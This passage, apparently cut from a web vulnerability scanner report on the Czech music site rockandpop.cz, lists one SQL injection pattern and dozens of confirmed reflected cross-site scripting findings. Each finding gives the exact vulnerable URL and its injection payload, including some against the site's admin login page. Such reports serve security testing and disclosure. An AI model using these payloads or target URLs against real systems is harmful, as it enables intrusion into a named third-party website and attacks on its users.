  652. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  653.  
  654. ||| XSS (Cross-site Scripting)
  655.  
  656. Severity: Important
  657. Confirmation: Confirmed
  658. URL: http://www.rockandpop.cz/underwood/login.php?'"--></style></script><script>alert(0x0000BE)</script>
  659. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  660. Parameter Name: Query Based
  661. Parameter Type: FullQueryString
  662. Attack Pattern: '"--></style></script><script>alert(0x0000BE)</script>
  663.  
  664. Severity: Important
  665. Confirmation: Confirmed
  666. URL: http://www.rockandpop.cz/zpravy/?'"--></style></script><script>alert(0x0000E0)</script>
  667. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  668. Parameter Name: Query Based
  669. Parameter Type: FullQueryString
  670. Attack Pattern: '"--></style></script><script>alert(0x0000E0)</script>
  671.  
  673. Severity: Important
  674. Confirmation: Confirmed
  675. URL: http://www.rockandpop.cz/?'"--></style></script><script>alert(0x0000DB)</script>
  676. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  677. Parameter Name: Query Based
  678. Parameter Type: FullQueryString
  679. Attack Pattern: '"--></style></script><script>alert(0x0000DB)</script>
  680.  
  681. Severity: Important
  682. Confirmation: Confirmed
  683. URL: http://www.rockandpop.cz/live/?'"--></style></script><script>alert(0x00011E)</script>
  684. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  685. Parameter Name: Query Based
  686. Parameter Type: FullQueryString
  687. Attack Pattern: '"--></style></script><script>alert(0x00011E)</script>
  688.  
  689. Severity: Important
  690. Confirmation: Confirmed
  691. URL: http://www.rockandpop.cz/clanky/?'"--></style></script><script>alert(0x00011F)</script>
  692. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  693. Parameter Name: Query Based
  694. Parameter Type: FullQueryString
  695. Attack Pattern: '"--></style></script><script>alert(0x00011F)</script>
  696.  
  697. Severity: Important
  698. Confirmation: Confirmed
  699. URL: http://www.rockandpop.cz/casopis/?'"--></style></script><script>alert(0x000123)</script>
  700. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  701. Parameter Name: Query Based
  702. Parameter Type: FullQueryString
  703. Attack Pattern: '"--></style></script><script>alert(0x000123)</script>
  704.  
  705. Severity: Important
  706. Confirmation: Confirmed
  707. URL: http://www.rockandpop.cz/video/?'"--></style></script><script>alert(0x000125)</script>
  708. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  709. Parameter Name: Query Based
  710. Parameter Type: FullQueryString
  711. Attack Pattern: '"--></style></script><script>alert(0x000125)</script>
  712.  
  713. Severity: Important
  714. Confirmation: Confirmed
  715. URL: http://www.rockandpop.cz/recenze/?'"--></style></script><script>alert(0x000128)</script>
  716. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  717. Parameter Name: Query Based
  718. Parameter Type: FullQueryString
  719. Attack Pattern: '"--></style></script><script>alert(0x000128)</script>
  720.  
  721. Severity: Important
  722. Confirmation: Confirmed
  723. URL: http://www.rockandpop.cz/redakce/?'"--></style></script><script>alert(0x000134)</script>
  724. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  725. Parameter Name: Query Based
  726. Parameter Type: FullQueryString
  727. Attack Pattern: '"--></style></script><script>alert(0x000134)</script>
  728.  
  729. Severity: Important
  730. Confirmation: Confirmed
  731. URL: http://www.rockandpop.cz/zpravy/zahranicni/?'"--></style></script><script>alert(0x000142)</script>
  732. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  733. Parameter Name: Query Based
  734. Parameter Type: FullQueryString
  735. Attack Pattern: '"--></style></script><script>alert(0x000142)</script>
  736.  
  737. Severity: Important
  738. Confirmation: Confirmed
  739. URL: http://www.rockandpop.cz/zpravy/zahranicni/your-demise-pripiji-na-nezavislost-s-novym-ohromujicim-ep/?'"--></style></script><script>alert(0x000168)</script>
  740. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  741. Parameter Name: Query Based
  742. Parameter Type: FullQueryString
  743. Attack Pattern: '"--></style></script><script>alert(0x000168)</script>
  744.  
  745. Severity: Important
  746. Confirmation: Confirmed
  748. URL: http://www.rockandpop.cz/zpravy/zahranicni/metallica-se-rozpovidala-o-planovanem-3d-filmu/?'"--></style></script><script>alert(0x0001D1)</script>
  749. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  750. Parameter Name: Query Based
  751. Parameter Type: FullQueryString
  752. Attack Pattern: '"--></style></script><script>alert(0x0001D1)</script>
  753.  
  754. Severity: Important
  755. Confirmation: Confirmed
  756. URL: http://www.rockandpop.cz/zpravy/domaci/?'"--></style></script><script>alert(0x0001DE)</script>
  757. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  758. Parameter Name: Query Based
  759. Parameter Type: FullQueryString
  760. Attack Pattern: '"--></style></script><script>alert(0x0001DE)</script>
  761.  
  762. Severity: Important
  763. Confirmation: Confirmed
  764. URL: http://www.rockandpop.cz/zpravy/zahranicni/my-bloody-valentine-zverejnili-po-22-letech-treti-desku/?'"--></style></script><script>alert(0x0001CE)</script>
  765. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  766. Parameter Name: Query Based
  767. Parameter Type: FullQueryString
  768. Attack Pattern: '"--></style></script><script>alert(0x0001CE)</script>
  769.  
  770. Severity: Important
  771. Confirmation: Confirmed
  772. URL: http://www.rockandpop.cz/zpravy/domaci/system-of-a-down-vystoupi-v-praze/?'"--></style></script><script>alert(0x0001CB)</script>
  773. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  774. Parameter Name: Query Based
  775. Parameter Type: FullQueryString
  776. Attack Pattern: '"--></style></script><script>alert(0x0001CB)</script>
  777.  
  778. Severity: Important
  779. Confirmation: Confirmed
  780. URL: http://www.rockandpop.cz/zpravy/zahranicni/randy-blythe:-spravne-veci-se-nemohu-otocit-zady/?'"--></style></script><script>alert(0x0001F6)</script>
  781. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  782. Parameter Name: Query Based
  783. Parameter Type: FullQueryString
  784. Attack Pattern: '"--></style></script><script>alert(0x0001F6)</script>
  785.  
  786. Severity: Important
  787. Confirmation: Confirmed
  788. URL: http://www.rockandpop.cz/zpravy/domaci/soutez-o-2x2-vstupenky-na-koncert-slobodne-europy-v-praze/?'"--></style></script><script>alert(0x0001F3)</script>
  789. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  790. Parameter Name: Query Based
  791. Parameter Type: FullQueryString
  792. Attack Pattern: '"--></style></script><script>alert(0x0001F3)</script>
  793.  
  794. Severity: Important
  795. Confirmation: Confirmed
  796. URL: http://www.rockandpop.cz/zpravy/zahranicni/stone-sour-predstavuji-novou-skladbu/?'"--></style></script><script>alert(0x000219)</script>
  797. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  798. Parameter Name: Query Based
  799. Parameter Type: FullQueryString
  800. Attack Pattern: '"--></style></script><script>alert(0x000219)</script>
  801.  
  802. Severity: Important
  803. Confirmation: Confirmed
  804. URL: http://www.rockandpop.cz/zpravy/domaci/stante-se-soucasti-rubriky-usi-s-asking-alexandria-a-while-she-sleeps/?'"--></style></script><script>alert(0x00021A)</script>
  805. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  806. Parameter Name: Query Based
  807. Parameter Type: FullQueryString
  808. Attack Pattern: '"--></style></script><script>alert(0x00021A)</script>
  809.  
  810. Severity: Important
  811. Confirmation: Confirmed
  812. URL: http://www.rockandpop.cz/zpravy/domaci/vyhrajte-2x2-vstupenky-na-ostravsky-koncert-uk-subs-a-tv-smithe/?'"--></style></script><script>alert(0x00021B)</script>
  813. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  814. Parameter Name: Query Based
  815. Parameter Type: FullQueryString
  816. Attack Pattern: '"--></style></script><script>alert(0x00021B)</script>
  817.  
  818. Severity: Important
  819. Confirmation: Confirmed
  820. URL: http://www.rockandpop.cz/zpravy/domaci/koncem-mesice-vyda-vydavatelstvi-emi-jedinecne-album-soliteri/?'"--></style></script><script>alert(0x000273)</script>
  821. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  822. Parameter Name: Query Based
  823. Parameter Type: FullQueryString
  824. Attack Pattern: '"--></style></script><script>alert(0x000273)</script>
  825.  
  826. Severity: Important
  827. Confirmation: Confirmed
  828. URL: http://www.rockandpop.cz/zpravy/domaci/chiki-liki-tu-a:-1000-koncertov-15-krajin-a-230-miest/?'"--></style></script><script>alert(0x00026A)</script>
  829. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  830. Parameter Name: Query Based
  831. Parameter Type: FullQueryString
  832. Attack Pattern: '"--></style></script><script>alert(0x00026A)</script>
  833.  
  834. Severity: Important
  835. Confirmation: Confirmed
  836. URL: http://www.rockandpop.cz/zpravy/zahranicni/marilyn-manson-zkolaboval-v-prubehu-koncertu/?'"--></style></script><script>alert(0x000286)</script>
  837. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  838. Parameter Name: Query Based
  839. Parameter Type: FullQueryString
  840. Attack Pattern: '"--></style></script><script>alert(0x000286)</script>
  841.  
  842. Severity: Important
  843. Confirmation: Confirmed
  844. URL: http://www.rockandpop.cz/zpravy/domaci/prazsky-vyber-zverejnil-jmena-hostu-jarniho-turne/?'"--></style></script><script>alert(0x000282)</script>
  845. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  846. Parameter Name: Query Based
  847. Parameter Type: FullQueryString
  848. Attack Pattern: '"--></style></script><script>alert(0x000282)</script>
  849.  
  850. Severity: Important
  851. Confirmation: Confirmed
  852. URL: http://www.rockandpop.cz/zpravy/zahranicni/poznejte-obycejny-den-na-turne-prostrednictvim-noveho-videoklipu-the-ghost-inside/?'"--></style></script><script>alert(0x000292)</script>
  853. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  854. Parameter Name: Query Based
  855. Parameter Type: FullQueryString
  856.  
  857. Severity: Important
  858. Confirmation: Confirmed
  859. URL: http://www.rockandpop.cz/zpravy/domaci/monkey-business-vydaji-nove-album-a-vyjedou-na-turne/?'"--></style></script><script>alert(0x0002B7)</script>
  860. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  861. Parameter Name: Query Based
  862. Parameter Type: FullQueryString
  863. Attack Pattern: '"--></style></script><script>alert(0x0002B7)</script>
  864.  
  865. Severity: Important
  866. Confirmation: Confirmed
  867. URL: http://www.rockandpop.cz/zpravy/domaci/britska-zpevacka-jessie-ware-se-tesi-na-evropske-turne/?'"--></style></script><script>alert(0x0002A9)</script>
  868. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  869. Parameter Name: Query Based
  870. Parameter Type: FullQueryString
  871. Attack Pattern: '"--></style></script><script>alert(0x0002A9)</script>
  872.  
  873. Severity: Important
  874. Confirmation: Confirmed
  876. URL: http://www.rockandpop.cz/zpravy/domaci/o5-a-radecek-opici-turne-zacne-koncertem-v-primem-prenosu/?'"--></style></script><script>alert(0x0002B8)</script>
  877. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  878. Parameter Name: Query Based
  879. Parameter Type: FullQueryString
  880. Attack Pattern: '"--></style></script><script>alert(0x0002B8)</script>
  881.  
  882. Severity: Important
  883. Confirmation: Confirmed
  884. URL: http://www.rockandpop.cz/zpravy/zahranicni/americti-confide-se-hlasi-ze-studia-a-pridavaji-ochutnavku/?'"--></style></script><script>alert(0x0002C8)</script>
  885. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  886. Parameter Name: Query Based
  887. Parameter Type: FullQueryString
  888. Attack Pattern: '"--></style></script><script>alert(0x0002C8)</script>
  889.  
  890. Severity: Important
  891. Confirmation: Confirmed
  892. URL: http://www.rockandpop.cz/zpravy/zahranicni/bruno-mars-predstavuje-klip-k-singlu-when-i-was-your-man/?'"--></style></script><script>alert(0x0002D4)</script>
  893. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  894. Parameter Name: Query Based
  895. Parameter Type: FullQueryString
  896. Attack Pattern: '"--></style></script><script>alert(0x0002D4)</script>
  897.  
  898. Severity: Important
  899. Confirmation: Confirmed
  900. URL: http://www.rockandpop.cz/live/young-guns-your-demise-criminal-colection-9-11-rock-cafe-praha/?'"--></style></script><script>alert(0x00031F)</script>
  901. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  902. Parameter Name: Query Based
  903. Parameter Type: FullQueryString
  904. Attack Pattern: '"--></style></script><script>alert(0x00031F)</script>
  905.  
  906. Severity: Important
  907. Confirmation: Confirmed
  908. URL: http://www.rockandpop.cz/clanky/mlada-krev-rock-pop/?'"--></style></script><script>alert(0x000352)</script>
  909. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  910. Parameter Name: Query Based
  911. Parameter Type: FullQueryString
  912. Attack Pattern: '"--></style></script><script>alert(0x000352)</script>
  913.  
  914. Severity: Important
  915. Confirmation: Confirmed
  916. URL: http://www.rockandpop.cz/clanky/mlada-krev-rock-pop/tribal-theory-funky-rock-n-roll-ze-zapadnich-cech/?'"--></style></script><script>alert(0x000360)</script>
  917. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  918. Parameter Name: Query Based
  919. Parameter Type: FullQueryString
  920. Attack Pattern: '"--></style></script><script>alert(0x000360)</script>
  921.  
  922. Severity: Important
  923. Confirmation: Confirmed
  924. URL: http://www.rockandpop.cz/video/rock-pop-tv-jiz-brzy/?'"--></style></script><script>alert(0x000387)</script>
  925. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  926. Parameter Name: Query Based
  927. Parameter Type: FullQueryString
  928. Attack Pattern: '"--></style></script><script>alert(0x000387)</script>
  929.  
  930. Severity: Important
  931. Confirmation: Confirmed
  932. URL: http://www.rockandpop.cz/clanky/mlada-krev-rock-pop/overhype-nadejna-kapela-z-brna/?'"--></style></script><script>alert(0x000374)</script>
  933. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  934. Parameter Name: Query Based
  935. Parameter Type: FullQueryString
  936. Attack Pattern: '"--></style></script><script>alert(0x000374)</script>
  937.  
  938. Severity: Important
  939. Confirmation: Confirmed
  940. URL: http://www.rockandpop.cz/video/branit-ve-cteni-casopisu-rock-pop-se-nevyplaci/?'"--></style></script><script>alert(0x0003B5)</script>
  941. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  942. Parameter Name: Query Based
  943. Parameter Type: FullQueryString
  944. Attack Pattern: '"--></style></script><script>alert(0x0003B5)</script>
  945.  
  946. Severity: Important
  947. Confirmation: Confirmed
  948. URL: http://www.rockandpop.cz/recenze/green-day-uno-dos-tre/?'"--></style></script><script>alert(0x0003E7)</script>
  949. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  950. Parameter Name: Query Based
  951. Parameter Type: FullQueryString
  952. Attack Pattern: '"--></style></script><script>alert(0x0003E7)</script>
  953.  
  954. Severity: Important
  955. Confirmation: Confirmed
  956. URL: http://www.rockandpop.cz/video/20-narozeniny-s-rock-pop-a-imodium/?'"--></style></script><script>alert(0x0003D5)</script>
  957. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  958. Parameter Name: Query Based
  959. Parameter Type: FullQueryString
  960. Attack Pattern: '"--></style></script><script>alert(0x0003D5)</script>
  961.  
  962. Severity: Important
  963. Confirmation: Confirmed
  964. URL: http://www.rockandpop.cz/clanky/rozhovory/?'"--></style></script><script>alert(0x0003F3)</script>
  965. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  966. Parameter Name: Query Based
  967. Parameter Type: FullQueryString
  968. Attack Pattern: '"--></style></script><script>alert(0x0003F3)</script>
  969.  
  970. Severity: Important
  971. Confirmation: Confirmed
  972. URL: http://www.rockandpop.cz/recenze/blink-182-dogs-eating-dogs/?'"--></style></script><script>alert(0x0003E1)</script>
  973. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  974. Parameter Name: Query Based
  975. Parameter Type: FullQueryString
  976. Attack Pattern: '"--></style></script><script>alert(0x0003E1)</script>
  977.  
  978. Severity: Important
  979. Confirmation: Confirmed
  980. URL: http://www.rockandpop.cz/recenze/tribal-theory-call-me-closer/?'"--></style></script><script>alert(0x0003ED)</script>
  981. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  982. Parameter Name: Query Based
  983. Parameter Type: FullQueryString
  984. Attack Pattern: '"--></style></script><script>alert(0x0003ED)</script>
  985.  
  986. Severity: Important
  987. Confirmation: Confirmed
  988. URL: http://www.rockandpop.cz/clanky/rozhovory/paul-banks:-ztotoznuji-se-s-pristupem-davida-lynche/?'"--></style></script><script>alert(0x000404)</script>
  989. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  990. Parameter Name: Query Based
  991. Parameter Type: FullQueryString
  992. Attack Pattern: '"--></style></script><script>alert(0x000404)</script>
  993.  
  994. Severity: Important
  995. Confirmation: Confirmed
  996. URL: http://www.rockandpop.cz/clanky/rozhovory/honza-homola-wohnout-:-muzika-z-kuchyne-i-zvuky-z-kozojedske-zahrady-a-orientu/?'"--></style></script><script>alert(0x000426)</script>
  997. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  998. Parameter Name: Query Based
  999. Parameter Type: FullQueryString
  1000. Attack Pattern: '"--></style></script><script>alert(0x000426)</script>
  1001.  
  1002. Severity: Important
  1003. Confirmation: Confirmed
  1004. URL: http://www.rockandpop.cz/clanky/tashi-tomas-erml/?'"--></style></script><script>alert(0x000463)</script>
  1005. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1006. Parameter Name: Query Based
  1007. Parameter Type: FullQueryString
  1008. Attack Pattern: '"--></style></script><script>alert(0x000463)</script>
  1009.  
  1010. Severity: Important
  1011. Confirmation: Confirmed
  1012. URL: http://www.rockandpop.cz/clanky/jak-to-slysi-parkway-drive/?'"--></style></script><script>alert(0x00044C)</script>
  1013. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1014. Parameter Name: Query Based
  1015. Parameter Type: FullQueryString
  1016. Attack Pattern: '"--></style></script><script>alert(0x00044C)</script>
  1017.  
  1018. Severity: Important
  1019. Confirmation: Confirmed
  1020. URL: http://www.rockandpop.cz/live/akce/7526-cena-hudebnich-kritiku-apollo-2012-sasazu-praha-6-2-2013/?'"--></style></script><script>alert(0x000483)</script>
  1021. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1022. Parameter Name: Query Based
  1023. Parameter Type: FullQueryString
  1024. Attack Pattern: '"--></style></script><script>alert(0x000483)</script>
  1025.  
  1026. Severity: Important
  1027. Confirmation: Confirmed
  1028. URL: http://www.rockandpop.cz/live/muj-report/?'"--></style></script><script>alert(0x00048B)</script>
  1029. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1030. Parameter Name: Query Based
  1031. Parameter Type: FullQueryString
  1032. Attack Pattern: '"--></style></script><script>alert(0x00048B)</script>
  1033.  
  1034. Severity: Important
  1035. Confirmation: Confirmed
  1036. URL: http://www.rockandpop.cz/fotky/?'"--></style></script><script>alert(0x000493)</script>
  1037. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1038. Parameter Name: Query Based
  1039. Parameter Type: FullQueryString
  1040. Attack Pattern: '"--></style></script><script>alert(0x000493)</script>
  1041.  
  1042. Severity: Important
  1043. Confirmation: Confirmed
  1044. URL: http://www.rockandpop.cz/fotky/upload/?'"--></style></script><script>alert(0x000499)</script>
  1045. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1046. Parameter Name: Query Based
  1047. Parameter Type: FullQueryString
  1048. Attack Pattern: '"--></style></script><script>alert(0x000499)</script>
  1049.  
  1050. Severity: Important
  1051. Confirmation: Confirmed
  1052. URL: http://www.rockandpop.cz/live/akce/7032-parkway-drive-predvedli-v-praze-australskou-saunu/?'"--></style></script><script>alert(0x0004C0)</script>
  1053. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1054. Parameter Name: Query Based
  1055. Parameter Type: FullQueryString
  1056. Attack Pattern: '"--></style></script><script>alert(0x0004C0)</script>
  1057.  
  1058. Severity: Important
  1059. Confirmation: Confirmed
  1060. URL: http://www.rockandpop.cz/live/akce/?'"--></style></script><script>alert(0x0004C2)</script>
  1061. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1062. Parameter Name: Query Based
  1063. Parameter Type: FullQueryString
  1064. Attack Pattern: '"--></style></script><script>alert(0x0004C2)</script>
  1065.  
  1066. Severity: Important
  1067. Confirmation: Confirmed
  1068. URL: http://www.rockandpop.cz/live/akce/6935-muse-everything-everything-22-11-2012-praha-o2-arena/?'"--></style></script><script>alert(0x000502)</script>
  1069. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1070. Parameter Name: Query Based
  1071. Parameter Type: FullQueryString
  1072. Attack Pattern: '"--></style></script><script>alert(0x000502)</script>
  1073.  
  1074. Severity: Important
  1075. Confirmation: Confirmed
  1076. URL: http://www.rockandpop.cz/live/akce/6909-into-darkness-tour-2012/?'"--></style></script><script>alert(0x00050A)</script>
  1077. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1078. Parameter Name: Query Based
  1079. Parameter Type: FullQueryString
  1080. Attack Pattern: '"--></style></script><script>alert(0x00050A)</script>
  1081.  
  1082. Severity: Important
  1083. Confirmation: Confirmed
  1084. URL: http://www.rockandpop.cz/live/akce/6566-serj-tankian-rozeskakal-lucernu/?'"--></style></script><script>alert(0x000511)</script>
  1085. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1086. Parameter Name: Query Based
  1087. Parameter Type: FullQueryString
  1088. Attack Pattern: '"--></style></script><script>alert(0x000511)</script>
  1089.  
  1090. Severity: Important
  1091. Confirmation: Confirmed
  1092. URL: http://www.rockandpop.cz/live/akce/6564-niceland-michal-hruza-kapela-hruzy-andel-music-bar-plzen-24-10-2012/?'"--></style></script><script>alert(0x000520)</script>
  1093. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1094. Parameter Name: Query Based
  1095. Parameter Type: FullQueryString
  1096. Attack Pattern: '"--></style></script><script>alert(0x000520)</script>
  1097.  
  1098. Severity: Important
  1099. Confirmation: Confirmed
  1100. URL: http://www.rockandpop.cz/live/akce/6545-fotky-z-koncertu-lionela-richieho/?'"--></style></script><script>alert(0x00052C)</script>
  1101. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1102. Parameter Name: Query Based
  1103. Parameter Type: FullQueryString
  1104. Attack Pattern: '"--></style></script><script>alert(0x00052C)</script>
  1105.  
  1106. Severity: Important
  1107. Confirmation: Confirmed
  1108. URL: http://www.rockandpop.cz/zpravy/festivaly/?'"--></style></script><script>alert(0x00052E)</script>
  1109. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1110. Parameter Name: Query Based
  1111. Parameter Type: FullQueryString
  1112. Attack Pattern: '"--></style></script><script>alert(0x00052E)</script>
  1113.  
  1114. Severity: Important
  1115. Confirmation: Confirmed
  1116. URL: http://www.rockandpop.cz/zpravy/festivaly/2012/?'"--></style></script><script>alert(0x000533)</script>
  1117. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1118. Parameter Name: Query Based
  1119. Parameter Type: FullQueryString
  1120. Attack Pattern: '"--></style></script><script>alert(0x000533)</script>
  1121.  
  1122. Severity: Important
  1123. Confirmation: Confirmed
  1124. URL: http://www.rockandpop.cz/casopis/rock-pop-2-13/?'"--></style></script><script>alert(0x00053C)</script>
  1125. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1126. Parameter Name: Query Based
  1127. Parameter Type: FullQueryString
  1128. Attack Pattern: '"--></style></script><script>alert(0x00053C)</script>
  1129.  
  1130. Severity: Important
  1131. Confirmation: Confirmed
  1132. URL: http://www.rockandpop.cz/mapa-stranek/?'"--></style></script><script>alert(0x000546)</script>
  1133. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1134. Parameter Name: Query Based
  1135. Parameter Type: FullQueryString
  1136. Attack Pattern: '"--></style></script><script>alert(0x000546)</script>
  1137.  
  1138. Severity: Important
  1139. Confirmation: Confirmed
  1140. URL: http://www.rockandpop.cz/newsletter/?'"--></style></script><script>alert(0x00055A)</script>
  1141. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1142. Parameter Name: Query Based
  1143. Parameter Type: FullQueryString
  1144. Attack Pattern: '"--></style></script><script>alert(0x00055A)</script>
  1145.  
  1146. Severity: Important
  1147. Confirmation: Confirmed
  1148. URL: http://www.rockandpop.cz/hledani/?'"--></style></script><script>alert(0x00058C)</script>
  1149. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1150. Parameter Name: Query Based
  1151. Parameter Type: FullQueryString
  1152. Attack Pattern: '"--></style></script><script>alert(0x00058C)</script>
  1153.  
  1154. Severity: Important
  1155. Confirmation: Confirmed
  1156. URL: http://www.rockandpop.cz/hledani/
  1157. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1158. Parameter Name: q
  1159. Parameter Type: Post
  1160. Attack Pattern: '"--></style></script><script>alert(0x000590)</script>
  1161.  
  1162. Severity: Important
  1163. Confirmation: Confirmed
  1164. URL: http://www.rockandpop.cz/zpravy/zahranicni/silverstein-lakaji-svym-nejnovejsim-videoklipem-na-aktualni-desku/?'"--></style></script><script>alert(0x0005B0)</script>
  1165. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1166. Parameter Name: Query Based
  1167. Parameter Type: FullQueryString
  1168. Attack Pattern: '"--></style></script><script>alert(0x0005B0)</script>
  1169.  
  1170. Severity: Important
  1171. Confirmation: Confirmed
  1172. URL: http://www.rockandpop.cz/zpravy/domaci/cenu-hudebnich-kritiku-apollo-2012-ziskal-boris-carloff/?'"--></style></script><script>alert(0x0005B4)</script>
  1173. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1174. Parameter Name: Query Based
  1175. Parameter Type: FullQueryString
  1176. Attack Pattern: '"--></style></script><script>alert(0x0005B4)</script>
  1177.  
  1178. Severity: Important
  1179. Confirmation: Confirmed
  1180. URL: http://www.rockandpop.cz/zpravy/zahranicni/p-nk-predstavuje-novy-videoklip-s-hvezdnym-hostem/?'"--></style></script><script>alert(0x0005B3)</script>
  1181. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1182. Parameter Name: Query Based
  1183. Parameter Type: FullQueryString
  1184. Attack Pattern: '"--></style></script><script>alert(0x0005B3)</script>
  1185.  
  1186. Severity: Important
  1187. Confirmation: Confirmed
  1188. URL: http://www.rockandpop.cz/zpravy/?page='"--></style></script><script>alert(0x0005E2)</script>
  1189. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1190. Parameter Name: page
  1191. Parameter Type: Querystring
  1192. Attack Pattern: '"--></style></script><script>alert(0x0005E2)</script>
  1193.  
  1194. Severity: Important
  1195. Confirmation: Confirmed
  1196. URL: http://www.rockandpop.cz/underwood/login.php/" stYle="x:expre/**/ssion(alert(9))
  1197. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1198. Parameter Name: URI-BASED
  1199. Parameter Type: RawUrlInjection
  1200. Attack Pattern: /" stYle="x:expre/**/ssion(alert(9))
  1201.  
  1202. Severity: Important
  1203. Confirmation: Confirmed
  1204. URL: http://www.rockandpop.cz/underwood/login.php?request='"--></style></script><script>alert(0x000602)</script>
  1205. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1206. Parameter Name: request
  1207. Parameter Type: Querystring
  1208. Attack Pattern: '"--></style></script><script>alert(0x000602)</script>
  1209.  
  1210. Severity: Important
  1211. Confirmation: Confirmed
  1212. URL: http://www.rockandpop.cz/zpravy/domaci/jarni-turne-the-prostitutes-zavrsi-rok-od-vydani-uspesneho-alba/?'"--></style></script><script>alert(0x00060C)</script>
